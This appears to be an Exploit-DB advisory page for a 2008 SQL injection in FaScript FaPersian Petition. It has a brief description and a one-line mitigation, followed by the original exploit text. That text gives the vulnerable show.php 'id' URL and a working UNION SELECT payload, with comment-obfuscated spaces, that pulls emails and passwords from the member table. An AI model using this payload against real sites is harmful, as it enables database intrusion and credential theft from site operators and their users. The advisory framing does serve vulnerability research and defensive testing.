FaScript FaPersian Petition Remote Sql Injection

vendor:

FaPersian Petition

by:

IRCRASH (Dr.Crash)

CVSS

HIGH

SQL Injection

CWE

Product Name: FaPersian Petition

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

FaScript FaPersian Petition Remote Sql Injection

A vulnerability exists in FaScript FaPersian Petition which allows an attacker to inject arbitrary SQL commands via the 'id' parameter in the 'show.php' script. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#####################################################################################
####           FaScript FaPersian Petition Remote Sql Injection                  ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://fascript.com/fapersianpetition.zip                        #
#                                                                                   #
#Injection Adress :  http://Sitename/fp/show.php?id=<SqL Code>                      #
#                                                                                   #
#                                                                                   #
#SQL For find Username and password : 999999'%20union/**/select/**/0,1,2,3,4,5,6,concat(0x3c62723e200d0a4c6f67696e3a,email,0x3c62723e200d0a50617373776f72643a,password),8,9,10,11/**/from/**/member/*
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-15]